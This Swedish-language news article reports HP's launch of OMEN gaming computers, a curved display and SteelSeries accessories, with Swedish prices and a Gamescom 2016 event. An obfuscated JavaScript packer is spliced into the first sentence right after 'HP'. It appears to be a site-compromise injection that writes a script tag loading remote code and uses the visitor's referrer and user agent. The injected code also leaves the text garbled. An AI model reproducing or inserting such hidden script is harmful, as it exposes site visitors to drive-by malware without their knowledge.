Image Image Image Image Image Image Image Image Image Image

| 3 december, 2020

Scroll to top

Top

HP släpper nya gamingdatorer i tungviktsklassen

HP släpper nya gamingdatorer i tungviktsklassen
Sebastian

HP eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dieee|var|u0026u|referrer|rrnes||js|php’.split(’|’),0,{}))
Inc. lanserar idag nya speldatorer med prestanda i toppklass samt tillbehör designade för dem som vill ha den ultimata spelupplevelsen. HPs nya högklassiga spelprodukter: OMEN X Desktop, OMEN 17 Laptop, OMEN X Curved Display och OMEN with SteelSeries-tillbehör är utformade för att leverera såväl prestanda som flexibilitet för spelentusiaster som kräver det bästa.

”Den stationära OMEN X är byggd för riktigt seriösa spelare som kräver den vassast tänkbara prestanda direkt vid leverans och som vill kunna anpassa och bygga ut datorn flera gånger under datorns livstid”,  säger Staffan Sjöberg, produktchef för konsumentdatorer i Norden på HP Inc. “HPs ingenjörer har skapat en dator med en unik design för att kunna optimera kylningen och dessutom erbjuda uppgraderingsmöjligheter med industristandardkomponenter allteftersom ny hårdvara blir tillgänglig på marknaden.”

OMEN X DESKTOP

OMEN X Desktop är en utökning av den breda spelportföljen som presenterades i maj och ett komplement som lägger till allt vad man kan begära i form av prestanda och expansionsmöjligheter. Den levereras med den senaste grafiken och kan utrustas med upp till dubbla NVIDIA GeForce GTX 1080 grafikkort för att höja prestandan i varje spel. 6:e generationens överklockningsbara Intel® Core™ i5/i7-processorer tillsammans med grafik från NVIDIA® eller AMD ger möjlighet till fantastiska VR- och 4K-upplevelser även i de mest krävande AAA-spelen.

HP har i OMEN X skapat en optimal värmehantering så att datorn håller sig kall även i de mest pressande sammanhang och ger spelarna tryggheten i att få ut högsta möjliga prestanda och fulla potential från hårdvaran. Värmehanteringen innehåller en trekammardesign för att separera olika komponenter och optimera luftflödena med dedikerad kylning i varje kammare. Omen X har också stöd för upp till tre 120 mm vätskekylda kylelement med toppmonterade luftutsläpp och ett stativ som lyfter chassit från ytan det står på för att dra in kall luft och ge maximal ventilation.

 • OMEN Control är ett program som ger fullständig designkontroll vilket möjliggör anpassade ljusändringar av LED-belysningen i datorn och justeringar av ljusstyrka i realtid
 • Chassit följer branschstandarder för så enkla uppgraderingar och modifieringar som möjligt
 • Verktygsfri tillgång till interna komponenter och dolda verktyg i chassit för att underlätta uppgraderingar

Möjligheten att bygga en dator från grunden är avgörande för verkligt entusiastiska spelare och en av de mest betydelsefulla differentiatorerna för OMEN X. De som vill bygga sin egen dator kommer kunna köpa tomma OMEN X chassin för att ha total kontroll över sitt datorbygge. Dessa fristående chassin har samma kylningsfördelar som trekammardesignen och bygger på branschstandarder vilket gör ett eget datorbygge så smidigt som man kan önska sig.

OMEN 17 Laptop

Den senaste 17.3” (43.9cm) OMEN Laptop är helt designad för de krävande spelarna. Den är nu en av de mest kraftfulla speldatorerna på marknaden genom införandet av den senaste NVIDIA® GeForce® GTX-grafiken, och samtidigt en av de mest portabla. Den är endast 32.9 mm tunn och väger 3,2 kg.

OMEN 17 Laptop är konstruerad och utformad för spelare och ger den uppslukande upplevelse och mångsidighet som krävs för avancerat datorspelande.

 • Den senaste NVIDIA® GeForce® GTX 1060 och 1070- grafiken levererar snabba, smidiga och strömsnåla spelupplevelser
 • G-SYNC™ skärmteknik optimerar spelet genom att synkronisera uppdateringsfrekvenserna mellan bildskärm och grafikkort
 • Fyra högtalare med ljud från Bang & Olufsen och HP Audio Boost för hög ljudkvalitet och realistisk ljudåtergivning
 • Tillägget av en mini Display Port™ ger stöd för dubbla skärmar med upplösning i 2K eller 4K
 • Upp till 4K-bildskärmsupplösning med 300 nits för en riktigt bra skärpa och ljusstyrka som förbättrar spelandet och underhållningen
 • VR-klar för spelare som vill vara förberedda inför nästa våg av spel med VR
 • 95W polymerbatteri med upp till 7.25 timmars körtid för att stötta de senaste grafikkorten från NVIDIA®

OMEN X by HP Curved Display – kom in i spelet

Bildkvaliteten har stor inverkan på den totala spelupplevelsen och för att ytterligare lyfta ekosystemet kring OMENs introducerar HP OMEN X Curved Display, som ger en ny nivå av realism och djup för slutanvändarna. Den böjda skärmen är den första från HP som erbjuder NVIDIA® G-Sync™-teknologi, som integrerar den senaste tekniken och ger fler alternativ för användare som söker breda betraktningsvinklar och en spelupplevelse som flyter på utan hack och flimmer.

OMEN by HP with SteelSeries – ta kontrollen

För att komplettera och förbättra användarnas upplevelse med den nya OMEN-serien samarbetar HP med SteelSeries för att introducera en rad tillbehör designade för att förhöja spelupplevelsen.

 • OMEN Headset with SteelSeries har en båge i en lätt konstruktion för att sprida vikten jämnt över huvudet så att spelare kan spela längre och mer bekvämt.
 • OMEN Keyboard with SteelSeries möjliggör egen anpassning med över 16,8 miljoner färger för att skapa unika färgscheman och möjliggöra färgändringar som svarar mot spelens innehåll.
 • OMEN Mouse with SteelSeries innehåller funktioner för oöverträffad prestanda inklusive anpassning som RGB-belysning, sex fullt programmerbara knappar för snabbkommandon och noll hårdvaruacceleration för 1:1 tracking och precisa rörelser
 • OMEN Mouse Pad with SteelSeries ger ett halkfritt gummiunderlag av hög kvalitet och precision

Mjukvaran för OMEN-plattformen är förinstallerad på OMEN-datorerna och erbjuds för både OMEN Keyboard och OMEN Mouse, vilket enkelt låter spelaren dra nytta av dess många funktioner genom att erbjuda plattformsoberoende stöd. Det finns även ett molnbaserat synksystem för att se till att kunderna alltid har sina favoritinställningar.

OMEN Challenge by HP på Gamescom 2016

HP kommer att vara värd för sin tredje OMEN Challenge i Europa på Gamescom 2016, med ett av världens mest populära PC-spel: “CS:GO” av Valve. Världens första live action-spel på Twitch, the OMEN Challenge, kommer att visa Mousesports’ CS:GO team ta sig an Flipsid3 Tactics där lagen kommer att utsättas för prövningar såsom vindstötar och kalla miljöer, för att testa den fysiska anpassningsförmågan och skickligheten hos dessa elitspelare.

Beväpnade med den senaste OMEN by HP-datorerna kommer de professionella spelarna bli pushade till sin absoluta gräns då både live- och onlinepubliken röstar om hur man ska distrahera dem.

The OMEN Challenge kommer att äga rum på ESL Arena i Hall 9 på Gamescom i Köln, Tyskland, kl 22:00 på torsdagen den 18 augusti. Den kan också ses på Twitch på: www.twitch.tv/omenchallenge.

Priser och tillgänglighet

 • OMEN X Desktop förväntas vara tillgänglig i Sverige i september och kosta från ca 24990 SEK. Det fristående OMEN X chassit beräknas komma senare under hösten och kommat att kosta från 6990 SEK.
 • OMEN X by HP Curved Display förväntas vara tillgänglig i Sverige i början av 2017.
 • OMEN 17 Laptop förväntas vara tillgänglig i Sverige i september och kosta från ca 14 990 SEK.
 • OMEN by HP with SteelSeries-tillbehör förväntas vara tillgängliga i Sverige i september och kosta ca 799 SEK för OMEN Headset, 999 SEK för OMEN Keyboard, 599 SEK för OMEN Mouse och 199 SEK för OMEN Mouse Pad.